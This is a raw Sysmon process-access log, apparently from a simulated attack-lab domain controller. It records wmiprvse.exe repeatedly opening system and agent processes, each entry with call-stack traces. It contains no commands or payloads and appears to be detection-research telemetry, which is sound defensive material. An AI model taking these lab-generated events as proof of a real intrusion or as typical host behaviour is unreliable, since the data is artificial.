Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023662Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023661Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023660Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023659Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023658Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023657Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023656Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023655Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023654Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023653Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023652Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023651Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023650Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023649Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023648Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023647Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023646Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023645Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023644Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023643Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc